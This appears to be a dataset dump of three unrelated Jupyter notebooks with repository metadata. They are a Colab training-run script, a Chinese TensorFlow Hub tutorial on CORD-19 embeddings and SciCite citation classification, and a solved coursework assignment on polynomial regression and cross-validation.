[ [ [ "from google.colab import drive\ndrive.mount('/content/drive')", "_____no_output_____" ], [ "!wget https://cmu.box.com/shared/static/s4lkm5ej7sh4px72vesr17b1gxam4hgy.gz", "_____no_output_____" ], [ "%tensorflow_version 1.x\n!pip install numpy==1.19.5\n\nimport tarfile\ntar = tarfile.open(\"/content/drive/MyDrive/s4lkm5ej7sh4px72vesr17b1gxam4hgy.gz\")\ntar.extractall()\ntar.close()\n\n\"Copy trans_fuse8.npy from original project folder to \\data\\ folder of current project\"", "_____no_output_____" ], [ "!python3 /content/drive/MyDrive/code/pretrain.py --group=0 --model=orig-pre --arch=original --lr=1e-2 --toIt=100000\n!python3 /content/drive/MyDrive/code/train.py --group=0 --model=orig-ft --arch=original --load=orig-pre_it100000 --lr=1e-5 --fromIt=0 --toIt=4000\n!python3 /content/drive/MyDrive/code/evaluate.py --group=0 --arch=original --load=orig-ft_it2000\n!python3 /content/drive/MyDrive/code/evaluate_dist.py --group=0 --load=orig-ft_it2000", "_____no_output_____" ], [ "!python3 /content/drive/MyDrive/code/pretrainv4.py --group=0 --model=orig-pre --arch=original --lr=5e-3 --toIt=100000\n!python3 /content/drive/MyDrive/code/train.py --group=0 --model=orig-ft --arch=original --load=orig-pre_it100000 --lr=5e-6 --fromIt=0 --toIt=4000\n!python3 /content/drive/MyDrive/code/evaluate.py --group=0 --arch=original --load=orig-ft_it400\n!python3 /content/drive/MyDrive/code/evaluate_dist.py --group=0 --load=orig-ft_it400", "_____no_output_____" ], [ "!python3 /content/drive/MyDrive/code/pretrainv8.py --group=0 --model=orig-pre --arch=original --lr=5e-3 --toIt=100000\n!python3 /content/drive/MyDrive/code/train.py --group=0 --model=orig-ft --arch=original --load=orig-pre_it100000 --lr=5e-6 --fromIt=0 --toIt=4000\n!python3 /content/drive/MyDrive/code/evaluate.py --group=0 --arch=original --load=orig-ft_it2000\n!python3 /content/drive/MyDrive/code/evaluate_dist.py --group=0 --load=orig-ft_it2000", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code" ] ]
cb1f02e4f3eb8536bb585d2622eab3270214f24d
13,226
ipynb
Jupyter Notebook
site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb
NarimaneHennouni/docs-l10n
39a48e0d5aa34950e29efd5c1f111c120185e9d9
[ "Apache-2.0" ]
2
2021-03-12T18:02:29.000Z
2021-06-18T19:32:41.000Z
site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb
NarimaneHennouni/docs-l10n
39a48e0d5aa34950e29efd5c1f111c120185e9d9
[ "Apache-2.0" ]
null
null
null
site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb
NarimaneHennouni/docs-l10n
39a48e0d5aa34950e29efd5c1f111c120185e9d9
[ "Apache-2.0" ]
null
null
null
32.258537
276
0.521246
[ [ [ "#### Copyright 2019 The TensorFlow Hub Authors.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");", "_____no_output_____" ] ], [ [ "# Copyright 2019 The TensorFlow Hub Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================", "_____no_output_____" ] ], [ [ "# 探索 TF-Hub CORD-19 Swivel 嵌入向量\n", "_____no_output_____" ], [ "<table class=\"tfo-notebook-buttons\" align=\"left\">\n <td><a target=\"_blank\" href=\"https://tensorflow.google.cn/hub/tutorials/cord_19_embeddings_keras\"><img src=\"https://tensorflow.google.cn/images/tf_logo_32px.png\">在 TensorFlow.org 上查看 </a></td>\n <td><a target=\"_blank\" href=\"https://colab.research.google.com/github/tensorflow/docs-l10n/blob/master/site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb\"><img src=\"https://tensorflow.google.cn/images/colab_logo_32px.png\">在 Google Colab 中运行 </a></td>\n <td><a target=\"_blank\" href=\"https://github.com/tensorflow/docs-l10n/blob/master/site/zh-cn/hub/tutorials/cord_19_embeddings_keras.ipynb\"><img src=\"https://tensorflow.google.cn/images/GitHub-Mark-32px.png\">在 GitHub 中查看源代码</a></td>\n <td><a href=\"https://storage.googleapis.com/tensorflow_docs/hub/examples/colab/cord_19_embeddings_keras.ipynb\">{img1下载笔记本</a></td>\n</table>", "_____no_output_____" ], [ "TF-Hub (https://tfhub.dev/tensorflow/cord-19/swivel-128d/3) 上的 CORD-19 Swivel 文本嵌入向量模块旨在支持研究员分析与 COVID-19 相关的自然语言文本。这些嵌入针对 [CORD-19 数据集](https://pages.semanticscholar.org/coronavirus-research)中文章的标题、作者、摘要、正文文本和参考文献标题进行了训练。\n\n在此 Colab 中,我们将进行以下操作:\n\n- 分析嵌入向量空间中语义相似的单词\n- 使用 CORD-19 嵌入向量在 SciCite 数据集上训练分类器\n", "_____no_output_____" ], [ "## 设置\n", "_____no_output_____" ] ], [ [ "import functools\nimport itertools\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\n\nimport tensorflow as tf\n\nimport tensorflow_datasets as tfds\nimport tensorflow_hub as hub\n\nfrom tqdm import trange", "_____no_output_____" ] ], [ [ "# 分析嵌入向量\n\n首先,我们通过计算和绘制不同术语之间的相关矩阵来分析嵌入向量。如果嵌入向量学会了成功捕获不同单词的含义,则语义相似的单词的嵌入向量应相互靠近。我们来看一些与 COVID-19 相关的术语。", "_____no_output_____" ] ], [ [ "# Use the inner product between two embedding vectors as the similarity measure\ndef plot_correlation(labels, features):\n corr = np.inner(features, features)\n corr /= np.max(corr)\n sns.heatmap(corr, xticklabels=labels, yticklabels=labels)\n\n# Generate embeddings for some terms\nqueries = [\n # Related viruses\n 'coronavirus', 'SARS', 'MERS',\n # Regions\n 'Italy', 'Spain', 'Europe',\n # Symptoms\n 'cough', 'fever', 'throat'\n]\n\nmodule = hub.load('https://tfhub.dev/tensorflow/cord-19/swivel-128d/3')\nembeddings = module(queries)\n\nplot_correlation(queries, embeddings)", "_____no_output_____" ] ], [ [ "可以看到,嵌入向量成功捕获了不同术语的含义。每个单词都与其所在簇的其他单词相似(即“coronavirus”与“SARS”和“MERS”高度相关),但与其他簇的术语不同(即“SARS”与“Spain”之间的相似度接近于 0)。\n\n现在,我们来看看如何使用这些嵌入向量解决特定任务。", "_____no_output_____" ], [ "## SciCite:引用意图分类\n\n本部分介绍了将嵌入向量用于下游任务(如文本分类)的方法。我们将使用 TensorFlow 数据集中的 [SciCite 数据集](https://tensorflow.google.cn/datasets/catalog/scicite)对学术论文中的引文意图进行分类。给定一个带有学术论文引文的句子,对引文的主要意图进行分类:是背景信息、使用方法,还是比较结果。", "_____no_output_____" ] ], [ [ "builder = tfds.builder(name='scicite')\nbuilder.download_and_prepare()\ntrain_data, validation_data, test_data = builder.as_dataset(\n split=('train', 'validation', 'test'),\n as_supervised=True)", "_____no_output_____" ], [ "#@title Let's take a look at a few labeled examples from the training set\nNUM_EXAMPLES = 10#@param {type:\"integer\"}\n\nTEXT_FEATURE_NAME = builder.info.supervised_keys[0]\nLABEL_NAME = builder.info.supervised_keys[1]\n\ndef label2str(numeric_label):\n m = builder.info.features[LABEL_NAME].names\n return m[numeric_label]\n\ndata = next(iter(train_data.batch(NUM_EXAMPLES)))\n\n\npd.DataFrame({\n TEXT_FEATURE_NAME: [ex.numpy().decode('utf8') for ex in data[0]],\n LABEL_NAME: [label2str(x) for x in data[1]]\n})", "_____no_output_____" ] ], [ [ "## 训练引用意图分类器\n\n我们将使用 Keras 在 [SciCite 数据集](https://tensorflow.google.cn/datasets/catalog/scicite)上对分类器进行训练。我们构建一个模型,该模型使用 CORD-19 嵌入向量,并在顶部具有一个分类层。", "_____no_output_____" ] ], [ [ "#@title Hyperparameters { run: \"auto\" }\n\nEMBEDDING = 'https://tfhub.dev/tensorflow/cord-19/swivel-128d/3' #@param {type: \"string\"}\nTRAINABLE_MODULE = False #@param {type: \"boolean\"}\n\nhub_layer = hub.KerasLayer(EMBEDDING, input_shape=[], \n dtype=tf.string, trainable=TRAINABLE_MODULE)\n\nmodel = tf.keras.Sequential()\nmodel.add(hub_layer)\nmodel.add(tf.keras.layers.Dense(3))\nmodel.summary()\nmodel.compile(optimizer='adam',\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])", "_____no_output_____" ] ], [ [ "## 训练并评估模型\n\n让我们训练并评估模型以查看在 SciCite 任务上的性能。", "_____no_output_____" ] ], [ [ "EPOCHS = 35#@param {type: \"integer\"}\nBATCH_SIZE = 32#@param {type: \"integer\"}\n\nhistory = model.fit(train_data.shuffle(10000).batch(BATCH_SIZE),\n epochs=EPOCHS,\n validation_data=validation_data.batch(BATCH_SIZE),\n verbose=1)", "_____no_output_____" ], [ "from matplotlib import pyplot as plt\ndef display_training_curves(training, validation, title, subplot):\n if subplot%10==1: # set up the subplots on the first call\n plt.subplots(figsize=(10,10), facecolor='#F0F0F0')\n plt.tight_layout()\n ax = plt.subplot(subplot)\n ax.set_facecolor('#F8F8F8')\n ax.plot(training)\n ax.plot(validation)\n ax.set_title('model '+ title)\n ax.set_ylabel(title)\n ax.set_xlabel('epoch')\n ax.legend(['train', 'valid.'])", "_____no_output_____" ], [ "display_training_curves(history.history['accuracy'], history.history['val_accuracy'], 'accuracy', 211)\ndisplay_training_curves(history.history['loss'], history.history['val_loss'], 'loss', 212)", "_____no_output_____" ] ], [ [ "## 评估模型\n\n我们来看看模型的表现。模型将返回两个值:损失(表示错误的数字,值越低越好)和准确率。", "_____no_output_____" ] ], [ [ "results = model.evaluate(test_data.batch(512), verbose=2)\n\nfor name, value in zip(model.metrics_names, results):\n print('%s: %.3f' % (name, value))", "_____no_output_____" ] ], [ [ "可以看到,损失迅速减小,而准确率迅速提高。我们绘制一些样本来检查预测与真实标签的关系:", "_____no_output_____" ] ], [ [ "prediction_dataset = next(iter(test_data.batch(20)))\n\nprediction_texts = [ex.numpy().decode('utf8') for ex in prediction_dataset[0]]\nprediction_labels = [label2str(x) for x in prediction_dataset[1]]\n\npredictions = [label2str(x) for x in model.predict_classes(prediction_texts)]\n\n\npd.DataFrame({\n TEXT_FEATURE_NAME: prediction_texts,\n LABEL_NAME: prediction_labels,\n 'prediction': predictions\n})", "_____no_output_____" ] ], [ [ "可以看到,对于此随机样本,模型大多数时候都会预测正确的标签,这表明它可以很好地嵌入科学句子。", "_____no_output_____" ], [ "# 后续计划\n\n现在,您已经对 TF-Hub 中的 CORD-19 Swivel 嵌入向量有了更多了解,我们鼓励您参加 CORD-19 Kaggle 竞赛,为从 COVID-19 相关学术文本中获得更深入的科学洞见做出贡献。\n\n- 参加 [CORD-19 Kaggle Challenge](https://www.kaggle.com/allen-institute-for-ai/CORD-19-research-challenge)\n- 详细了解 [COVID-19 Open Research Dataset (CORD-19)](https://pages.semanticscholar.org/coronavirus-research)\n- 访问 https://tfhub.dev/tensorflow/cord-19/swivel-128d/3,参阅文档并详细了解 TF-Hub 嵌入向量\n- 使用 [TensorFlow Embedding Projector](http://projector.tensorflow.org/?config=https://storage.googleapis.com/tfhub-examples/tensorflow/cord-19/swivel-128d/3/tensorboard/projector_config.json) 探索 CORD-19 嵌入向量空间", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ] ]
cb1f07b61aadd8491ac93443b861c8c3ad041939
149,745
ipynb
Jupyter Notebook
Jiang_Assignment_1/Jiang_Assignment_1.ipynb
snowhite2018/Leren
4ee88113cf4313b2ba1f3f349369e63f0f0826a3
[ "MIT" ]
null
null
null
Jiang_Assignment_1/Jiang_Assignment_1.ipynb
snowhite2018/Leren
4ee88113cf4313b2ba1f3f349369e63f0f0826a3
[ "MIT" ]
null
null
null
Jiang_Assignment_1/Jiang_Assignment_1.ipynb
snowhite2018/Leren
4ee88113cf4313b2ba1f3f349369e63f0f0826a3
[ "MIT" ]
null
null
null
203.734694
25,461
0.892457
[ [ [ "# Polynomial Regression and Cross Validation\n\nFor the first assignment we will do something that might seem familiar from *Probability Theory for Machine Learning*; try to fit a polynomial function to a provided dataset. Fitting a function is a quintessential example of *supervised learning*, specifically *regression*, making it a great place to start using machines to learn about *machine learning*. There are several concepts here that are applicable to lots of *supervised learning* algorithms, so it will be good to cover them in a familiar context first.\n\nThe notion of a *cost function* will be introduced here, which describes how well a given model fits the provided data. This function can then be minimized in several different ways, depending on complexity of the model and associated cost function, e.g. using *gradient descent* to iteratively approach the minimum or computing the minimum directly using an analytic method, both of which you may have seen some version of before.\n\nWe will start with the most basic model (linear) and compute the parameters that minimize the cost function directly, based on the derivate. It is important that you try and comprehend what you are doing in this most basic version (instead of just blindly trying to implement functions until they seem to work), as it will help you understand the more complex models that use the same principles later on. This means actually **watching the linked videos** and computing the partial derivates yourself to verify you understand all of the steps. \n\nThe other common concept introduced is model selection using *cross validation*. In this assignment it will be used to determine the degree of the polynomial we are fitting. Both cross validation for model selection and minizing a the cost function to achieve the best possible fit, are used in many other supervised models, like for example *neural networks*.\n\n## Material\n\nThe material for this assignment is based on sections **2.6 - 2.8** and **4.6 - 4.8** of the book *[Introduction to Machine Learning](https://www.cmpe.boun.edu.tr/~ethem/i2ml3e/)* by Ethem Alpaydin. In addition, there will be links to videos from Andrew Ng's *[Machine Learning course on Coursera](https://www.coursera.org/learn/machine-learning)* to provide some extra explanations and help create intuitions.\n\nGenerally speaking, using built-in functions will be fine for this course, but for this assignment you **may not** use any of the polynomial functions listed [here](https://docs.scipy.org/doc/numpy/reference/routines.polynomials.poly1d.html) or other built-in polynomial solution methods. You can of course use them to check your own implementations work correctly.\n\nIn total there are *27* points available in this exercise. Below are some imports to get your started. You do not need to add any code for this cell to work, just make sure you run the cell to actually import the libraries in your notebook.\n", "_____no_output_____" ] ], [ [ "%matplotlib inline\n\nimport numpy as np\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\nfrom IPython.display import YouTubeVideo", "_____no_output_____" ] ], [ [ "## Loading the data [1 pt]\n\nWrite a function to read the data stored in the file `points.csv` and convert it to a *Numpy* array. Each line in the file is a data point consisting of an **x**-value and **r**-value, separated by a comma. You could use Numpy's [loadtxt](https://docs.scipy.org/doc/numpy/reference/generated/numpy.loadtxt.html), or any other method of your choice to read csv-files and convert that to the correct type.\n\nTest your function and print the resulting array to make sure you know what the data looks like.", "_____no_output_____" ] ], [ [ "# YOUR SOLUTION HERE\ndata = np.loadtxt('points.csv', delimiter=',')\ndata", "_____no_output_____" ] ], [ [ "## Plotting the points [2 pt]\n\nWrite a function `split_X_r` to separate your `data` into an X matrix and a R matrix using [slicing](https://docs.scipy.org/doc/numpy/reference/arrays.indexing.html).\n\nUsing both vectors, create a graph containing the plotted points you just read from the file. For this you can use the *matplotlib* functions [plot](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.plot) and [show](http://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.show). A plot of data should be visible below your code. HINT: [You can check the shapes](https://docs.scipy.org/doc/numpy/reference/generated/numpy.ndarray.shape.html) of X and R, they should both be (30,1).", "_____no_output_____" ] ], [ [ "def split_X_R(data):\n # YOUR SOLUTION HERE\n X = np.array([data[:,0]]).T\n R = np.array([data[:,1]]).T\n return X, R\n# YOUR SOLUTION HERE\nX, R = split_X_R(data)\nplt.scatter(X, R)\nplt.show()", "_____no_output_____" ] ], [ [ "## Defining the linear model [1 pt]\n\nNow we are going to try to find the function which best relates these points. We will start by fitting a simple linear function of the form\n\n(2.15) $$g(x) = w_1x + w_0$$\n\n*For more detailed description of linear regression, watch Andrew's videos on the topic. The notation is slightly different, $y$ instead of $r$ for the output, and $\\theta$ instead of $w$ for the model parameters, but the actual model is identical.*", "_____no_output_____" ] ], [ [ "display(YouTubeVideo('ls7Ke48jCt8'))\ndisplay(YouTubeVideo('PBZUjnGuXjA'))", "_____no_output_____" ] ], [ [ "Now write a function that computes the predicted output value $g(x)$ given a value of $x$ and the parameters $w_0$ and $w_1$. This should be very straightforward, but make sure you understand what part this plays in our supervised learning problem before moving on.", "_____no_output_____" ] ], [ [ "def linear_model(w0, w1, x):\n # YOUR SOLUTION HERE\n return w0+w1*x", "_____no_output_____" ] ], [ [ "## Creating the cost function [2 pt]\n\nThe cost function is defined as the sum of the squared errors of each prediction\n\n(2.16) $$E(w_1, w_0|X) = \\frac{1}{N}\\sum^N_{t=1} [r^t - (w_1x^t + w_0)]^2$$\n\n*These videos are great for building intuition on the relation between the hypothesis function and the associated cost of that hypothesis for the data.*", "_____no_output_____" ] ], [ [ "display(YouTubeVideo('EANr4YttXIQ'))\ndisplay(YouTubeVideo('J5vJFwQWOaY'))", "_____no_output_____" ] ], [ [ "Write a function to compute the cost based on the dataset $X$, $R$ and parameters $w_0$ and $w_1$. Based on your plot of the data, try to estimate some sensible values for $w_0$ and $w_1$ and compute the corresponding cost. Try at least 3 different guesses and print their cost. Order the prints of your guesses from highest to lowest cost.", "_____no_output_____" ] ], [ [ "def linear_cost(w0, w1, X, R):\n # YOUR SOLUTION HERE\n return np.sum((w0+w1*X-R)**2)/len(R)", "_____no_output_____" ], [ "# Guess 1 w0=-200, w1=100\nprint(linear_cost(-200, 100, X, R))\n# Guess 2 w0=-100, w1=10\nprint(linear_cost(-100, 10, X, R))\n# Guess 3 w0=0, w1=0\nprint(linear_cost(0, 0, X, R))", "125813.8834593852\n74055.22824945165\n55279.41576950028\n" ] ], [ [ "## Fitting the linear model [4 pt]\n\nWe can find the minimum value of the cost function by taking the partial derivatives of that cost function for both of the weights $w_0$ and $w_1$ and setting them equal to $0$, resulting in the equations\n\n(2.17a) $$w_1 = \\frac{\\sum_tx^tr^t - \\bar{x}\\bar{r}N}{\\sum_t(x^t)^2 - N\\bar{x}^2}$$\n(2.17b) $$w_0 = \\bar{r} - w_1\\bar{x}$$\n\nYou can compute the partial derivates of equation *2.16* yourself and set them both equal to zero, to check you understand where these two equations come from. Minimizing the cost function gives us the best possible parameters for a linear model predicting the values of the provided dataset. *Note:* If you are unfamiliar with the notation $\\bar{x}$, it is defined in *Alpaydin* too, below equation *2.17*.\n\nWrite a function which computes the optimal values of $w_0$ and $w_1$ for a dataset consisting of the vectors $X$ and $R$, containing $N$ elements each. Use *matplotlib* again to plot the points, but now also add the line representing the hypothesis function you found. As the line is linear, you can simply plot it by computing the 2 end points and have *matplotlib* draw the connecting line.\n\nNote that with some clever [array operations](https://docs.scipy.org/doc/numpy/reference/routines.array-manipulation.html) and [linear algebra](https://docs.scipy.org/doc/numpy/reference/routines.linalg.html) you can avoid explicitly looping over all the elements in $X$ and $R$ in `linear_fit`, which will make you code a lot faster. However, this is just an optional extra and any working implementation of the equations above will be considered correct.", "_____no_output_____" ] ], [ [ "def linear_fit(X, R, N):\n # YOUR SOLUTION HERE\n xbar = np.mean(X)\n rbar = np.mean(R)\n w1 = (np.sum(X*R) - xbar*rbar*N) / (np.sum(X**2) - N*xbar**2)\n w0 = rbar - w1*xbar\n return w0,w1\n# YOUR SOLUTION HERE\nplt.scatter(X, R)\nw0,w1 = linear_fit(X, R, len(R))\ny1 = linear_model(w0, w1, -5)\ny2 = linear_model(w0, w1, 5)\nplt.plot([-5,5], [y1,y2])\nplt.show()", "_____no_output_____" ] ], [ [ "## Polynomial data [3 pt]\n\nThe linear model can easily be extended to polynomials of any order by expanding the original input with the squared input $x^2$, the cubed input $x^3$, etc and adding additional weights to the model. For ease of calculation, the input is also expanded with a vector of $1$'s, to represent the input for the constant parameter $w_0$. The parameters then become $w_0$, $w_1$, $w_2$, etc., one factor for each term of the polynomial.\n\nSo if originally the dataset of $N$ elements is of the form $X$ (superscripts are indices here)\n\n$$ X = \\left[\\begin{array}{c} x^1 \\\\ x^2 \\\\ \\vdots \\\\ x^N \\end{array} \\right]$$\n\nThen the matrix $D$ for a $k^{th}$-order polynomial becomes\n\n$$ D = \\left[\\begin{array}{cccc}\n1 & x^1 & (x^1)^2 & \\cdots & (x^1)^k \\\\ \n1 & x^2 & (x^2)^2 & \\cdots & (x^2)^k \\\\ \n\\vdots \\\\\n1 & x^N & (x^N)^2 & \\cdots & (x^N)^k \\\\ \n\\end{array} \\right]$$\n\nWrite a function `create_D_matrix` that constructs this matrix for a given vector $X$ up the specified order $k$. Looking at plots for the dataset we have been using so far, the relationship between the points will probably be at least be quadratic. Use the function to construct a matrix $D$ of order $2$, print the matrix and verify that it looks correct.", "_____no_output_____" ] ], [ [ "def create_D_matrix(X, k):\n # YOUR SOLUTION HERE\n return np.array([X.reshape(len(X),)**i for i in range(k+1)]).T\nD = create_D_matrix(X, 2)", "_____no_output_____" ] ], [ [ "## Polynomial model [2 pt]\n\nThe parameters can now be represented as\n\n$$ w = \\left[\\begin{array}{c} w_0 \\\\ w_1 \\\\ \\vdots \\\\ w_k \\end{array} \\right]$$\n\nThe hypothesis for a single input then just becomes\n\n$$ g(x^1) = \\sum_{i=0}^k D^1_iw_i $$\n\nWhich can write as a matrix multiplication for all inputs in a single equation\n\n$$ \\left[\\begin{array}{cccc}\n1 & x^1 & (x^1)^2 & \\cdots & (x^1)^k \\\\ \n1 & x^2 & (x^2)^2 & \\cdots & (x^2)^k \\\\ \n\\vdots \\\\\n1 & x^N & (x^N)^2 & \\cdots & (x^N)^k \\\\ \n\\end{array} \\right]\n\\left[\\begin{array}{c} w_0 \\\\ w_1 \\\\ \\vdots \\\\ w_k \\end{array} \\right] = \\left[\\begin{array}{c} g(x^1) \\\\ g(x^2) \\\\ \\vdots \\\\ g(x^N) \\end{array} \\right]$$\n\nYou can do matrix multiplication using the [dot](https://docs.scipy.org/doc/numpy/reference/generated/numpy.dot.html) function. Write 2 functions for computing the polynomial below\n\n* `poly_val` should take a single input value $x$ and a vector of polynomial weights $W$ and compute the single hypothesis value for that input. We can use this function later to show the polynomial that we have fitted (just like the function `linear_model`).\n* `poly_model` should take a matrix $D$ and weight vector $W$ and compute the corresponding vector of hypotheses. ", "_____no_output_____" ] ], [ [ "def poly_val(x, W):\n # YOUR SOLUTION HERE\n return np.dot(np.array([x**i for i in range(len(W))]),W)\ndef poly_model(D, W):\n # YOUR SOLUTION HERE\n return np.dot(D, W)", "_____no_output_____" ] ], [ [ "## Polynomial cost function and model fitting [3 pts]\n\nAnd for the cost function we can now use\n\n$$ E(w|X) = \\frac{1}{2N} \\sum_{t=1}^N [r^t - D^tw]^2$$\n\nHere, we compute the hypothesis $g(x)$ for every example using $D^tw$, take the difference with the actual output $r$ and finally square and sum each difference. Note that this is extremely similar to the mean squared error function we used for the linear case, and also that minimizing this error function is actually equivalent to maximizing the log likelihood of the parameter vector $w$ (see equations $4.31$ and $4.32$).\n\nNow we have the cost function equation and can again take the partial derivative for each of the weights $w_0$ to $w_k$ and set their value equal to $0$. Solving the resulting system of equations will give the set of weights that minimize the cost function. The weights describing this lowest point of the cost function are the parameters which will produce the line that best fits our dataset.\n\nSolving all partial derivate equations for each weight can actually be done with just a couple of matrix operations. Deriving the equation yourself can be a bit involved, but know that the principle is exactly the same as for the linear model computing just $w_0$ and $w_1$. The final equation for weight vector becomes\n\n(4.33) $$ w = (D^TD)^{-1}D^Tr $$\n\nNumpy has built in functions for [transpose](https://docs.scipy.org/doc/numpy/reference/generated/numpy.transpose.html) and [inverse](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linalg.inv.html). Use them to write the code for the following functions.\n\n* `poly_cost` should return the total cost $E$ given $w$, $D$ and $r$. We can use this to see how good a fit is.\n* `poly_fit` should return the vector $w$ that bests fits the polynomial relationship between matrix $D$ and vector $r$\n\nUsing the quadratic matrix $D$ you constructed earlier and this `poly_fit` function, find the best fitting weights for a quadric polynomial on the data and print these weights\n", "_____no_output_____" ] ], [ [ "def poly_cost(W, D, R):\n # YOUR SOLUTION HERE\n return np.sum((R - np.dot(D,W))**2) / (2*len(R))\ndef poly_fit(D, R): \n # YOUR SOLUTION HERE\n return np.dot(np.dot(inv(np.dot(np.transpose(D),D)),np.transpose(D)),R)\n# YOUR SOLUTION HERE\nW = poly_fit(D, R)\nprint(W)", "[[-56.87348684]\n [ 52.14107002]\n [ 16.02439317]]\n" ] ], [ [ "## Plotting polynomials [1 pt]\n\nNow lets try and figure out what our fitted quadratic polynomial looks like. As the function is not linear, we will need more than just 2 points to actually plot the line. The easiest solution is to create a whole bunch of x-values as samples, compute the corresponding y-values and plot those. With enough samples the line will look smooth, even if it is connected with linear segments.\n\nTo create these x-values samples, we can use the function [linspace](https://docs.scipy.org/doc/numpy/reference/generated/numpy.linspace.html). Then just use the `poly_val` function you wrote earlier and apply it to every x-value to compute the array of y-values. Now just plot the original datapoints as dots and the hypothesis as a line, just as for the linear plot. Don't forget to show your plot at the end.\n\nUse these steps to fill in the `poly_plot` function below and show the polynomial function defined by the weights you found for the quadratic polynomial.", "_____no_output_____" ] ], [ [ "def poly_plot(W, X, R):\n # YOUR SOLUTION HERE\n x = np.linspace(-5,5,100)\n y = [poly_val(xi, W) for xi in x]\n plt.scatter(X,R)\n plt.plot(x, y)\n plt.show()\npoly_plot(W, X, R)", "_____no_output_____" ] ], [ [ "## Polynomial order [1 pt]\n\nYou can now create a polynomial fit on the data for a polynomial of any order. The next question then becomes: *What order polynomial fits the data the best?*\n\nUsing the `create_D_matrix`, `poly_fit` and `poly_plot`, try to fit different order polynomials to the data. Show the plot for the order polynomial you think fits best.\n\nNote that the cost function will most likely decrease with each added polynomial term, as there is more flexibility in the model to fit the data points exactly. However, these weights will fit those few data points very well, but might have very extreme values in between points that would not be good predictors for new inputs. Something like an order 20 polynomial might have a very well fitting shape for the existing data points, but looks like it would be strange predictor at some of the possible other points. Try to find a fit that looks visually like it would generalize well to new points.\n", "_____no_output_____" ] ], [ [ "# YOUR SOLUTION HERE\nD = create_D_matrix(X, 4)\nW = poly_fit(D, R)\npoly_plot(W, X, R)", "_____no_output_____" ] ], [ [ "## Cross validation [2 pt]\n\nAnother way to answer this same question is to use cross validation. With cross validation you split the data into 2 parts and use one part to fit the model (training set) and the other part to see how well the model fits the remaining data (validation set). This way, we can select a model that is less prone to overfitting. \n\nWrite a function below to split the original dataset into 2 sets according to a given ratio. It is important to randomize your division, as simply using the first half of data for the one set and the second half for the other, might result in a strange distribution. You could use a function like [shuffle](https://docs.scipy.org/doc/numpy/reference/generated/numpy.random.shuffle.html) for this purpose.\n\nSplit the original dataset using a ratio of 0.6 into a training and a validation set. Then for both of these sets, use your old `split_X_R` function to split them into their $X$ and $R$ parts", "_____no_output_____" ] ], [ [ "def validation_split(data, ratio):\n # YOUR SOLUTION HERE\n np.random.shuffle(data)\n n = int(ratio*len(data))\n training_set = data[:n, :]\n validation_set = data[n:, :]\n return training_set, validation_set\n# YOUR SOLUTION HERE\ntraining_set, validation_set = validation_split(data, 0.6)\ntrain_x, train_r = split_X_R(training_set)\nval_x, val_r = split_X_R(validation_set)", "_____no_output_____" ] ], [ [ "## Model selection [5 pt]\n\nWith this new split of the data you can just repeatedly fit different order polynomials to the training set and see which produces the lowest cost on the validation set. The set of weights with the lowests cost on the validation set generalizes the best to new data and is thus the best overal fit on the dataset. \n\nWrite the function `best_poly_fit` below. Try a large range of polynomial orders (like 1 to 50), create the $D$ matrix based on the training set for each order and fit the weights for that polynomial. Then for each of these found weights, also create the D matrix for the validation set and compute the cost using `poly_cost`. Return the set of weights with the lowest cost on the validation set and the corresponding cost.\n\nRun this fitting function with your training and validation sets. Plot the hypothesis function and show the weights that were found and what the cost was. Note that rerunning your validation split code above will result in a different random distribution and thus a slightly different final fit.", "_____no_output_____" ] ], [ [ "def best_poly_fit(train_x, train_r, val_x, val_r):\n # YOUR SOLUTION HERE\n lowest_cost = float('inf')\n best_w = 0\n for k in range(1,51):\n train_D = create_D_matrix(train_x, k)\n W = poly_fit(train_D, train_r)\n val_D = create_D_matrix(val_x, k)\n cost = poly_cost(W, val_D, val_r)\n if cost < lowest_cost:\n lowest_cost = cost\n best_w = W\n return best_w, lowest_cost\n# YOUR SOLUTION HERE\nbest_w, lowest_cost = best_poly_fit(train_x, train_r, val_x, val_r)\npoly_plot(best_w, X, R)\nprint('The weights are:\\n' +str(best_w)+'\\nThe cost is:\\n'+str(lowest_cost))", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1f0aafd22d9c60fe1029b644bc98b9529e113f
3,012
ipynb
Jupyter Notebook
examples/userstory_1.ipynb
bajor/MoneyPy
